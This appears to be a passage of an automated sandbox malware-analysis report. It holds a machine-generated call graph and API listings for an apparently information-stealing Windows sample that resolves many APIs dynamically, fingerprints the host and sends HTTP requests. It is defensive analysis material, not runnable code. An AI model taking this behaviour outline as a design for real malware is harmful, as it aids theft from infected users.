calls 26962->26963 26964 393d1b 26963->26964 26965 394a60 2 API calls 26964->26965 26966 393d31 26965->26966 26967 394a60 2 API calls 26966->26967 26968 393d47 26967->26968 26969 394a60 2 API calls 26968->26969 26970 393d60 26969->26970 26971 394a60 2 API calls 26970->26971 26972 393d76 26971->26972 26973 394a60 2 API calls 26972->26973 26974 393d8c 26973->26974 26975 394a60 2 API calls 26974->26975 26976 393da2 26975->26976 26977 394a60 2 API calls 26976->26977 26978 393db8 26977->26978 26979 394a60 2 API calls 26978->26979 26980 393dce 26979->26980 26981 394a60 2 API calls 26980->26981 26982 393de7 26981->26982 26983 394a60 2 API calls 26982->26983 26984 393dfd 26983->26984 26985 394a60 2 API calls 26984->26985 26986 393e13 26985->26986 26987 394a60 2 API calls 26986->26987 26988 393e29 26987->26988 26989 394a60 2 API calls 26988->26989 26990 393e3f 26989->26990 26991 394a60 2 API calls 26990->26991 26992 393e55 26991->26992 26993 394a60 2 API calls 26992->26993 26994 393e6e 26993->26994 26995 394a60 2 API calls 26994->26995 26996 393e84 26995->26996 26997 394a60 2 API calls 26996->26997 26998 393e9a 26997->26998 26999 394a60 2 API calls 26998->26999 27000 393eb0 26999->27000 27001 394a60 2 API calls 27000->27001 27002 393ec6 27001->27002 27003 394a60 2 API calls 27002->27003 27004 393edc 27003->27004 27005 394a60 2 API calls 27004->27005 27006 393ef5 27005->27006 27007 394a60 2 API calls 27006->27007 27008 393f0b 27007->27008 27009 394a60 2 API calls 27008->27009 27010 393f21 27009->27010 27011 394a60 2 API calls 27010->27011 27012 393f37 27011->27012 27013 394a60 2 API calls 27012->27013 27014 393f4d 27013->27014 27015 394a60 2 API calls 27014->27015 27016 393f63 27015->27016 27017 394a60 2 API calls 27016->27017 27018 393f7c 27017->27018 27019 394a60 2 API calls 27018->27019 27020 393f92 27019->27020 27021 394a60 2 API calls 27020->27021 27022 393fa8 27021->27022 27023 394a60 2 API calls 27022->27023 27024 393fbe 27023->27024 27025 394a60 2 API calls 27024->27025 27026 393fd4 27025->27026 27027 394a60 2 API calls 27026->27027 27028 393fea 27027->27028 27029 394a60 2 API calls 27028->27029 27030 394003 27029->27030 27031 394a60 2 API calls 27030->27031 27032 394019 27031->27032 27033 394a60 2 API calls 27032->27033 27034 39402f 27033->27034 27035 394a60 2 API calls 27034->27035 27036 394045 27035->27036 27037 394a60 2 API calls 27036->27037 27038 39405b 27037->27038 27039 394a60 2 API calls 27038->27039 27040 394071 27039->27040 27041 394a60 2 API calls 27040->27041 27042 39408a 27041->27042 27043 394a60 2 API calls 27042->27043 27044 3940a0 27043->27044 27045 394a60 2 API calls 27044->27045 27046 3940b6 27045->27046 27047 394a60 2 API calls 27046->27047 27048 3940cc 27047->27048 27049 394a60 2 API calls 27048->27049 27050 3940e2 27049->27050 27051 394a60 2 API calls 27050->27051 27052 3940f8 27051->27052 27053 394a60 2 API calls 27052->27053 27054 394111 27053->27054 27055 394a60 2 API calls 27054->27055 27056 394127 27055->27056 27057 394a60 2 API calls 27056->27057 27058 39413d 27057->27058 27059 394a60 2 API calls 27058->27059 27060 394153 27059->27060 27061 394a60 2 API calls 27060->27061 27062 394169 27061->27062 27063 394a60 2 API calls 27062->27063 27064 39417f 27063->27064 27065 394a60 2 API calls 27064->27065 27066 394198 27065->27066 27067 394a60 2 API calls 27066->27067 27068 3941ae 27067->27068 27069 394a60 2 API calls 27068->27069 27070 3941c4 27069->27070 27071 394a60 2 API calls 27070->27071 27072 3941da 27071->27072 27073 394a60 2 API calls 27072->27073 27074 3941f0 27073->27074 27075 394a60 2 API calls 27074->27075 27076 394206 27075->27076 27077 394a60 2 API calls 27076->27077 27078 39421f 27077->27078 27079 394a60 2 API calls 27078->27079 27080 394235 27079->27080 27081 394a60 2 API calls 27080->27081 27082 39424b 27081->27082 27083 394a60 2 API calls 27082->27083 27084 394261 27083->27084 27085 394a60 2 API calls 27084->27085 27086 394277 27085->27086 27087 394a60 2 API calls 27086->27087 27088 39428d 27087->27088 27089 394a60 2 API calls 27088->27089 27090 3942a6 27089->27090 27091 394a60 2 API calls 27090->27091 27092 3942bc 27091->27092 27093 394a60 2 API calls 27092->27093 27094 3942d2 27093->27094 27095 394a60 2 API calls 27094->27095 27096 3942e8 27095->27096 27097 394a60 2 API calls 27096->27097 27098 3942fe 27097->27098 27099 394a60 2 API calls 27098->27099 27100 394314 27099->27100 27101 394a60 2 API calls 27100->27101 27102 39432d 27101->27102 27103 394a60 2 API calls 27102->27103 27104 394343 27103->27104 27105 394a60 2 API calls 27104->27105 27106 394359 27105->27106 27107 394a60 2 API calls 27106->27107 27108 39436f 27107->27108 27109 394a60 2 API calls 27108->27109 27110 394385 27109->27110 27111 394a60 2 API calls 27110->27111 27112 39439b 27111->27112 27113 394a60 2 API calls 27112->27113 27114 3943b4 27113->27114 27115 394a60 2 API calls 27114->27115 27116 3943ca 27115->27116 27117 394a60 2 API calls 27116->27117 27118 3943e0 27117->27118 27119 394a60 2 API calls 27118->27119 27120 3943f6 27119->27120 27121 394a60 2 API calls 27120->27121 27122 39440c 27121->27122 27123 394a60 2 API calls 27122->27123 27124 394422 27123->27124 27125 394a60 2 API calls 27124->27125 27126 39443b 27125->27126 27127 394a60 2 API calls 27126->27127 27128 394451 27127->27128 27129 394a60 2 API calls 27128->27129 27130 394467 27129->27130 27131 394a60 2 API calls 27130->27131 27132 39447d 27131->27132 27133 394a60 2 API calls 27132->27133 27134 394493 27133->27134 27135 394a60 2 API calls 27134->27135 27136 3944a9 27135->27136 27137 394a60 2 API calls 27136->27137 27138 3944c2 27137->27138 27139 394a60 2 API calls 27138->27139 27140 3944d8 27139->27140 27141 394a60 2 API calls 27140->27141 27142 3944ee 27141->27142 27143 394a60 2 API calls 27142->27143 27144 394504 27143->27144 27145 394a60 2 API calls 27144->27145 27146 39451a 27145->27146 27147 394a60 2 API calls 27146->27147 27148 394530 27147->27148 27149 394a60 2 API calls 27148->27149 27150 394549 27149->27150 27151 394a60 2 API calls 27150->27151 27152 39455f 27151->27152 27153 394a60 2 API calls 27152->27153 27154 394575 27153->27154 27155 394a60 2 API calls 27154->27155 27156 39458b 27155->27156 27157 394a60 2 API calls 27156->27157 27158 3945a1 27157->27158 27159 394a60 2 API calls 27158->27159 27160 3945b7 27159->27160 27161 394a60 2 API calls 27160->27161 27162 3945d0 27161->27162 27163 394a60 2 API calls 27162->27163 27164 3945e6 27163->27164 27165 394a60 2 API calls 27164->27165 27166 3945fc 27165->27166 27167 394a60 2 API calls 27166->27167 27168 394612 27167->27168 27169 394a60 2 API calls 27168->27169 27170 394628 27169->27170 27171 394a60 2 API calls 27170->27171 27172 39463e 27171->27172 27173 394a60 2 API calls 27172->27173 27174 394657 27173->27174 27175 394a60 2 API calls 27174->27175 27176 39466d 27175->27176 27177 394a60 2 API calls 27176->27177 27178 394683 27177->27178 27179 394a60 2 API calls 27178->27179 27180 394699 27179->27180 27181 394a60 2 API calls 27180->27181 27182 3946af 27181->27182 27183 394a60 2 API calls 27182->27183 27184 3946c5 27183->27184 27185 394a60 2 API calls 27184->27185 27186 3946de 27185->27186 27187 394a60 2 API calls 27186->27187 27188 3946f4 27187->27188 27189 394a60 2 API calls 27188->27189 27190 39470a 27189->27190 27191 394a60 2 API calls 27190->27191 27192 394720 27191->27192 27193 394a60 2 API calls 27192->27193 27194 394736 27193->27194 27195 394a60 2 API calls 27194->27195 27196 39474c 27195->27196 27197 394a60 2 API calls 27196->27197 27198 394765 27197->27198 27199 394a60 2 API calls 27198->27199 27200 39477b 27199->27200 27201 394a60 2 API calls 27200->27201 27202 394791 27201->27202 27203 394a60 2 API calls 27202->27203 27204 3947a7 27203->27204 27205 394a60 2 API calls 27204->27205 27206 3947bd 27205->27206 27207 394a60 2 API calls 27206->27207 27208 3947d3 27207->27208 27209 394a60 2 API calls 27208->27209 27210 3947ec 27209->27210 27211 394a60 2 API calls 27210->27211 27212 394802 27211->27212 27213 394a60 2 API calls 27212->27213 27214 394818 27213->27214 27215 394a60 2 API calls 27214->27215 27216 39482e 27215->27216 27217 394a60 2 API calls 27216->27217 27218 394844 27217->27218 27219 394a60 2 API calls 27218->27219 27220 39485a 27219->27220 27221 394a60 2 API calls 27220->27221 27222 394873 27221->27222 27223 394a60 2 API calls 27222->27223 27224 394889 27223->27224 27225 394a60 2 API calls 27224->27225 27226 39489f 27225->27226 27227 394a60 2 API calls 27226->27227 27228 3948b5 27227->27228 27229 394a60 2 API calls 27228->27229 27230 3948cb 27229->27230 27231 394a60 2 API calls 27230->27231 27232 3948e1 27231->27232 27233 394a60 2 API calls 27232->27233 27234 3948fa 27233->27234 27235 394a60 2 API calls 27234->27235 27236 394910 27235->27236 27237 394a60 2 API calls 27236->27237 27238 394926 27237->27238 27239 394a60 2 API calls 27238->27239 27240 39493c 27239->27240 27241 394a60 2 API calls 27240->27241 27242 394952 27241->27242 27243 394a60 2 API calls 27242->27243 27244 394968 27243->27244 27245 394a60 2 API calls 27244->27245 27246 394981 27245->27246 27247 394a60 2 API calls 27246->27247 27248 394997 27247->27248 27249 394a60 2 API calls 27248->27249 27250 3949ad 27249->27250 27251 394a60 2 API calls 27250->27251 27252 3949c3 27251->27252 27253 394a60 2 API calls 27252->27253 27254 3949d9 27253->27254 27255 394a60 2 API calls 27254->27255 27256 3949ef 27255->27256 27257 394a60 2 API calls 27256->27257 27258 394a08 27257->27258 27259 394a60 2 API calls 27258->27259 27260 394a1e 27259->27260 27261 394a60 2 API calls 27260->27261 27262 394a34 27261->27262 27263 394a60 2 API calls 27262->27263 27264 394a4a 27263->27264 27265 3b66e0 27264->27265 27266 3b6afe 8 API calls 27265->27266 27267 3b66ed 43 API calls 27265->27267 27268 3b6c08 27266->27268 27269 3b6b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27266->27269 27267->27266 27270 3b6cd2 27268->27270 27271 3b6c15 8 API calls 27268->27271 27269->27268 27272 3b6cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27270->27272 27273 3b6d4f 27270->27273 27271->27270 27272->27273 27274 3b6de9 27273->27274 27275 3b6d5c 6 API calls 27273->27275 27276 3b6f10 27274->27276 27277 3b6df6 12 API calls 27274->27277 27275->27274 27278 3b6f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27276->27278 27279 3b6f8d 27276->27279 27277->27276 27278->27279 27280 3b6fc1 27279->27280 27281 3b6f96 GetProcAddress GetProcAddress 27279->27281 27282 3b6fca GetProcAddress GetProcAddress 27280->27282 27283 3b6ff5 27280->27283 27281->27280 27282->27283 27284 3b70ed 27283->27284 27285 3b7002 10 API calls 27283->27285 27286 3b7152 27284->27286 27287 3b70f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27284->27287 27285->27284 27288 3b715b GetProcAddress 27286->27288 27289 3b716e 27286->27289 27287->27286 27288->27289 27290 3b051f 27289->27290 27291 3b7177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27289->27291 27292 391530 27290->27292 27291->27290 27601 391610 27292->27601 27294 39153b 27295 391555 lstrcpy 27294->27295 27296 39155d 27294->27296 27295->27296 27297 391577 lstrcpy 27296->27297 27298 39157f 27296->27298 27297->27298 27299 391599 lstrcpy 27298->27299 27301 3915a1 27298->27301 27299->27301 27300 391605 27303 3af1b0 lstrlen 27300->27303 27301->27300 27302 3915fd lstrcpy 27301->27302 27302->27300 27304 3af1e4 27303->27304 27305 3af1eb lstrcpy 27304->27305 27306 3af1f7 lstrlen 27304->27306 27305->27306 27307 3af208 27306->27307 27308 3af21b lstrlen 27307->27308 27309 3af20f lstrcpy 27307->27309 27310 3af22c 27308->27310 27309->27308 27311 3af233 lstrcpy 27310->27311 27312 3af23f 27310->27312 27311->27312 27313 3af258 lstrcpy 27312->27313 27314 3af264 27312->27314 27313->27314 27315 3af286 lstrcpy 27314->27315 27316 3af292 27314->27316 27315->27316 27317 3af2ba lstrcpy 27316->27317 27318 3af2c6 27316->27318 27317->27318 27319 3af2ea lstrcpy 27318->27319 27380 3af300 27318->27380 27319->27380 27320 3af30c lstrlen 27320->27380 27321 3af4b9 lstrcpy 27321->27380 27322 3af3a1 lstrcpy 27322->27380 27323 3af3c5 lstrcpy 27323->27380 27324 3af4e8 lstrcpy 27384 3af4f0 27324->27384 27325 3af479 lstrcpy 27325->27380 27326 3af59c lstrcpy 27326->27384 27327 3af70f StrCmpCA 27332 3afe8e 27327->27332 27327->27380 27328 3af616 StrCmpCA 27328->27327 27328->27384 27329 3afa29 StrCmpCA 27340 3afe2b 27329->27340 27329->27380 27330 3af73e lstrlen 27330->27380 27331 3afead lstrlen 27343 3afec7 27331->27343 27332->27331 27338 3afea5 lstrcpy 27332->27338 27333 3afd4d StrCmpCA 27335 3afd60 Sleep 27333->27335 27345 3afd75 27333->27345 27334 3afa58 lstrlen 27334->27380 27335->27380 27336 3af64a lstrcpy 27336->27384 27337 391530 8 API calls 27337->27384 27338->27331 27339 3afe4a lstrlen 27353 3afe64 27339->27353 27340->27339 27341 3afe42 lstrcpy 27340->27341 27341->27339 27342 3af89e lstrcpy 27342->27380 27344 3afee7 lstrlen 27343->27344 27348 3afedf lstrcpy 27343->27348 27351 3aff01 27344->27351 27346 3afd94 lstrlen 27345->27346 27349 3afd8c lstrcpy 27345->27349 27355 3afdae 27346->27355 27347 3af76f lstrcpy 27347->27380 27348->27344 27349->27346 27350 3afbb8 lstrcpy 27350->27380 27361 3aff21 27351->27361 27364 3aff19 lstrcpy 27351->27364 27352 3afa89 lstrcpy 27352->27380 27354 3afdce lstrlen 27353->27354 27356 3afe7c lstrcpy 27353->27356 27363 3afde8 27354->27363 27355->27354 27368 3afdc6 lstrcpy 27355->27368 27356->27354 27357 3af791 lstrcpy 27357->27380 27359 391530 8 API calls 27359->27380 27360 3af8cd lstrcpy 27360->27384 27365 391610 4 API calls 27361->27365 27362 3afbe7 lstrcpy 27362->27384 27370 3afe08 27363->27370 27372 3afe00 lstrcpy 27363->27372 27364->27361 27387 3afe13 27365->27387 27366 3afaab lstrcpy 27366->27380 27367 3af698 lstrcpy 27367->27384 27368->27354 27369 3aefb0 35 API calls 27369->27384 27373 391610 4 API calls 27370->27373 27371 3aee90 28 API calls 27371->27380 27372->27370 27373->27387 27374 3af7e2 lstrcpy 27374->27380 27375 3af924 lstrcpy 27375->27384 27376 3af99e StrCmpCA 27376->27329 27376->27384 27377 3afafc lstrcpy 27377->27380 27378 3afc3e lstrcpy 27378->27384 27379 3afcb8 StrCmpCA 27379->27333 27379->27384 27380->27320 27380->27321 27380->27322 27380->27323 27380->27324 27380->27325 27380->27327 27380->27329 27380->27330 27380->27333 27380->27334 27380->27342 27380->27347 27380->27350 27380->27352 27380->27357 27380->27359 27380->27360 27380->27362 27380->27366 27380->27371 27380->27374 27380->27377 27380->27384 27381 3af9cb lstrcpy 27381->27384 27382 3afce9 lstrcpy 27382->27384 27383 3aee90 28 API calls 27383->27384 27384->27326 27384->27328 27384->27329 27384->27333 27384->27336 27384->27337 27384->27367 27384->27369 27384->27375 27384->27376 27384->27378 27384->27379 27384->27380 27384->27381 27384->27382 27384->27383 27385 3afa19 lstrcpy 27384->27385 27386 3afd3a lstrcpy 27384->27386 27385->27384 27386->27384 27387->26411 27389 3b278c GetVolumeInformationA 27388->27389 27390 3b2785 27388->27390 27391 3b27ec GetProcessHeap RtlAllocateHeap 27389->27391 27390->27389 27393 3b2826 wsprintfA 27391->27393 27394 3b2822 27391->27394 27393->27394 27611 3b71e0 27394->27611 27398 394c70 27397->27398 27399 394c85 27398->27399 27400 394c7d lstrcpy 27398->27400 27615 394bc0 27399->27615 27400->27399 27402 394c90 27403 394ccc lstrcpy 27402->27403 27404 394cd8 27402->27404 27403->27404 27405 394cff lstrcpy 27404->27405 27406 394d0b 27404->27406 27405->27406 27407 394d2f lstrcpy 27406->27407 27408 394d3b 27406->27408 27407->27408 27409 394d6d lstrcpy 27408->27409 27410 394d79 27408->27410 27409->27410 27411 394dac InternetOpenA StrCmpCA 27410->27411 27412 394da0 lstrcpy 27410->27412 27413 394de0 27411->27413 27412->27411 27414 3954b8 InternetCloseHandle CryptStringToBinaryA 27413->27414 27619 3b3e70 27413->27619 27415 3954e8 LocalAlloc 27414->27415 27432 3955d8 27414->27432 27417 3954ff CryptStringToBinaryA 27415->27417 27415->27432 27418 395529 lstrlen 27417->27418 27419 395517 LocalFree 27417->27419 27420 39553d 27418->27420 27419->27432 27422 395563 lstrlen 27420->27422 27423 395557 lstrcpy 27420->27423 27421 394dfa 27424 394e23 lstrcpy lstrcat 27421->27424 27425 394e38 27421->27425 27427 39557d 27422->27427 27423->27422 27424->27425 27426 394e5a lstrcpy 27425->27426 27428 394e62 27425->27428 27426->27428 27429 39558f lstrcpy lstrcat 27427->27429 27430 3955a2 27427->27430 27431 394e71 lstrlen 27428->27431 27429->27430 27433 3955d1 27430->27433 27435 3955c9 lstrcpy 27430->27435 27434 394e89 27431->27434 27432->26440 27433->27432 27436 394e95 lstrcpy lstrcat 27434->27436 27437 394eac 27434->27437 27435->27433 27436->27437 27438 394ed5 27437->27438 27439 394ecd lstrcpy 27437->27439 27440 394edc lstrlen 27438->27440 27439->27438 27441 394ef2 27440->27441 27442 394efe lstrcpy lstrcat 27441->27442 27443 394f15 27441->27443 27442->27443 27444 394f36 lstrcpy 27443->27444 27445 394f3e 27443->27445 27444->27445 27446 394f65 lstrcpy lstrcat 27445->27446 27447 394f7b 27445->27447 27446->27447 27448 394fa4 27447->27448 27449 394f9c lstrcpy 27447->27449 27450 394fab lstrlen 27448->27450 27449->27448 27451 394fc1 27450->27451 27452 394fcd lstrcpy lstrcat 27451->27452 27453 394fe4 27451->27453 27452->27453 27454 39500d 27453->27454 27455 395005 lstrcpy 27453->27455 27456 395014 lstrlen 27454->27456 27455->27454 27457 39502a 27456->27457 27458 395036 lstrcpy lstrcat 27457->27458 27459 39504d 27457->27459 27458->27459 27460 395079 27459->27460 27461 395071 lstrcpy 27459->27461 27462 395080 lstrlen 27460->27462 27461->27460 27463 39509b 27462->27463 27464 3950ac lstrcpy lstrcat 27463->27464 27465 3950bc 27463->27465 27464->27465 27466 3950da lstrcpy lstrcat 27465->27466 27467 3950ed 27465->27467 27466->27467 27468 39510b lstrcpy 27467->27468 27469 395113 27467->27469 27468->27469 27470 395121 InternetConnectA 27469->27470 27470->27414 27471 395150 HttpOpenRequestA 27470->27471 27472 39518b 27471->27472 27473 3954b1 InternetCloseHandle 27471->27473 27626 3b7310 lstrlen 27472->27626 27473->27414 27477 3951a4 27634 3b72c0 27477->27634 27480 3b7280 lstrcpy 27481 3951c0 27480->27481 27482 3b7310 3 API calls 27481->27482 27483 3951d5 27482->27483 27484 3b7280 lstrcpy 27483->27484 27485 3951de 27484->27485 27486 3b7310 3 API calls 27485->27486 27487 3951f4 27486->27487 27488 3b7280 lstrcpy 27487->27488 27489 3951fd 27488->27489 27490 3b7310 3 API calls 27489->27490 27491 395213 27490->27491 27492 3b7280 lstrcpy 27491->27492 27493 39521c 27492->27493 27494 3b7310 3 API calls 27493->27494 27495 395231 27494->27495 27496 3b7280 lstrcpy 27495->27496 27497 39523a 27496->27497 27498 3b72c0 2 API calls 27497->27498 27499 39524d 27498->27499 27500 3b7280 lstrcpy 27499->27500 27501 395256 27500->27501 27502 3b7310 3 API calls 27501->27502 27503 39526b 27502->27503 27504 3b7280 lstrcpy 27503->27504 27505 395274 27504->27505 27506 3b7310 3 API calls 27505->27506 27507 395289 27506->27507 27508 3b7280 lstrcpy 27507->27508 27509 395292 27508->27509 27510 3b72c0 2 API calls 27509->27510 27511 3952a5 27510->27511 27512 3b7280 lstrcpy 27511->27512 27513 3952ae 27512->27513 27514 3b7310 3 API calls 27513->27514 27515 3952c3 27514->27515 27516 3b7280 lstrcpy 27515->27516 27517 3952cc 27516->27517 27518 3b7310 3 API calls 27517->27518 27519 3952e2 27518->27519 27520 3b7280 lstrcpy 27519->27520 27521 3952eb 27520->27521 27522 3b7310 3 API calls 27521->27522 27523 395301 27522->27523 27524 3b7280 lstrcpy 27523->27524 27525 39530a 27524->27525 27526 3b7310 3 API calls 27525->27526 27527 39531f 27526->27527 27528 3b7280 lstrcpy 27527->27528 27529 395328 27528->27529 27530 3b72c0 2 API calls 27529->27530 27531 39533b 27530->27531 27532 3b7280 lstrcpy 27531->27532 27533 395344 27532->27533 27534 39537c 27533->27534 27535 395370 lstrcpy 27533->27535 27536 3b72c0 2 API calls 27534->27536 27535->27534 27537 39538a 27536->27537 27538 3b72c0 2 API calls 27537->27538 27539 395397 27538->27539 27540 3b7280 lstrcpy 27539->27540 27541 3953a1 27540->27541 27542 3953b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27541->27542 27543 39549c InternetCloseHandle 27542->27543 27547 3953f2 27542->27547 27545 3954ae 27543->27545 27544 3953fd lstrlen 27544->27547 27545->27473 27546 39542e lstrcpy lstrcat 27546->27547 27547->27543 27547->27544 27547->27546 27548 395473 27547->27548 27549 39546b lstrcpy 27547->27549 27550 39547a InternetReadFile 27548->27550 27549->27548 27550->27543 27550->27547 27552 3a8cc6 ExitProcess 27551->27552 27567 3a8ccd 27551->27567 27553 3a8ee2 27553->26442 27554 3a8d5a lstrlen 27554->27567 27555 3a8dbd StrCmpCA 27555->27567 27556 3a8ddd StrCmpCA 27556->27567 27557 3a8dfd StrCmpCA 27557->27567 27558 3a8e1d StrCmpCA 27558->27567 27559 3a8e3d StrCmpCA 27559->27567 27560 3a8d30 lstrlen 27560->27567 27561 3a8e56 StrCmpCA 27561->27567 27562 3a8e88 lstrlen 27562->27567 27563 3a8e6f StrCmpCA 27563->27567 27564 3a8d06 lstrlen 27564->27567 27565 3a8d84 StrCmpCA 27565->27567 27566 3a8da4 StrCmpCA 27566->27567 27567->27553 27567->27554 27567->27555 27567->27556 27567->27557 27567->27558 27567->27559 27567->27560 27567->27561 27567->27562 27567->27563 27567->27564 27567->27565 27567->27566 27568 3a8ebb lstrcpy 27567->27568 27568->27567 27569->26448 27570->26450 27571->26456 27572->26458 27573->26464 27574->26466 27575->26472 27576->26476 27577->26482 27578->26484 27579->26488 27580->26502 27581->26506 27582->26505 27583->26501 27584->26505 27585->26520 27586->26508 27587->26509 27588->26513 27589->26516 27590->26522 27591->26528 27592->26531 27593->26538 27594->26559 27595->26563 27596->26562 27597->26558 27598->26562 27599->26572 27602 39161f 27601->27602 27603 39162b lstrcpy 27602->27603 27604 391633 27602->27604 27603->27604 27605 39164d lstrcpy 27604->27605 27606 391655 27604->27606 27605->27606 27607 39166f lstrcpy 27606->27607 27609 391677 27606->27609 27607->27609 27608 391699 27608->27294 27609->27608 27610 391691 lstrcpy 27609->27610 27610->27608 27612 3b71e6 27611->27612 27613 3b71fc lstrcpy 27612->27613 27614 3b2860 27612->27614 27613->27614 27614->26437 27616 394bd0 27615->27616 27616->27616 27617 394bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27616->27617 27618 394c41 27617->27618 27618->27402 27620 3b3e83 27619->27620 27621 3b3e9f lstrcpy 27620->27621 27622 3b3eab 27620->27622 27621->27622 27623 3b3ecd lstrcpy 27622->27623 27624 3b3ed5 GetSystemTime 27622->27624 27623->27624 27625 3b3ef3 27624->27625 27625->27421 27627 3b732d 27626->27627 27628 39519b 27627->27628 27629 3b733d lstrcpy lstrcat 27627->27629 27630 3b7280 27628->27630 27629->27628 27631 3b728c 27630->27631 27632 3b72b4 27631->27632 27633 3b72ac lstrcpy 27631->27633 27632->27477 27633->27632 27635 3b72dc 27634->27635 27636 3951b7 27635->27636 27637 3b72ed lstrcpy lstrcat 27635->27637 27636->27480 27637->27636 27665 3b31f0 GetSystemInfo wsprintfA 27644 3a4c77 295 API calls 27645 395869 57 API calls 27670 3a1269 408 API calls 27660 3b2d60 11 API calls 27682 3b2b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27661 3a3959 244 API calls 27666 3a01d9 126 API calls 27646 3b2853 lstrcpy 27656 3b2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27690 3a8615 48 API calls 27647 3ae049 147 API calls 27657 3b3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27691 3b33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27683 3a8615 49 API calls

                                Executed Functions

                                Function 00394C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00394C7F
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394CD2
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394D05
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394D35
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394D73
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394DA6
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00394DB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: a2175ba95b15a86119cf78d25b78952a845d4bf7fbf57412bc59da19c10cd6a6
                                • Instruction ID: 1577b475884d1180d8ce6cf3c0527ba31dd9376c58f8dc0b82914a47cd3aba3c
                                • Opcode Fuzzy Hash: a2175ba95b15a86119cf78d25b78952a845d4bf7fbf57412bc59da19c10cd6a6
                                • Instruction Fuzzy Hash: 06524B32911A16AFDF23EBA4DC49EAF77B9AF54300F194424F905AB251DB30ED46CB90
                                Function 003B6390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2125 3b6390-3b63bd GetPEB 2126 3b65c3-3b6623 LoadLibraryA * 5 2125->2126 2127 3b63c3-3b65be call 3b62f0 GetProcAddress * 20 2125->2127 2129 3b6638-3b663f 2126->2129 2130 3b6625-3b6633 GetProcAddress 2126->2130 2127->2126 2132 3b666c-3b6673 2129->2132 2133 3b6641-3b6667 GetProcAddress * 2 2129->2133 2130->2129 2134 3b6688-3b668f 2132->2134 2135 3b6675-3b6683 GetProcAddress 2132->2135 2133->2132 2136 3b6691-3b669f GetProcAddress 2134->2136 2137 3b66a4-3b66ab 2134->2137 2135->2134 2136->2137 2139 3b66ad-3b66d2 GetProcAddress * 2 2137->2139 2140 3b66d7-3b66da 2137->2140 2139->2140
                                APIs
                                • GetProcAddress.KERNEL32(76210000,00F71740), ref: 003B63E9
                                • GetProcAddress.KERNEL32(76210000,00F71680), ref: 003B6402
                                • GetProcAddress.KERNEL32(76210000,00F71548), ref: 003B641A
                                • GetProcAddress.KERNEL32(76210000,00F71560), ref: 003B6432
                                • GetProcAddress.KERNEL32(76210000,00F789A8), ref: 003B644B
                                • GetProcAddress.KERNEL32(76210000,00F65588), ref: 003B6463
                                • GetProcAddress.KERNEL32(76210000,00F655C8), ref: 003B647B
                                • GetProcAddress.KERNEL32(76210000,00F717A0), ref: 003B6494
                                • GetProcAddress.KERNEL32(76210000,00F71650), ref: 003B64AC
                                • GetProcAddress.KERNEL32(76210000,00F715F0), ref: 003B64C4
                                • GetProcAddress.KERNEL32(76210000,00F71758), ref: 003B64DD
                                • GetProcAddress.KERNEL32(76210000,00F65408), ref: 003B64F5
                                • GetProcAddress.KERNEL32(76210000,00F71788), ref: 003B650D
                                • GetProcAddress.KERNEL32(76210000,00F715A8), ref: 003B6526
                                • GetProcAddress.KERNEL32(76210000,00F655E8), ref: 003B653E
                                • GetProcAddress.KERNEL32(76210000,00F715C0), ref: 003B6556
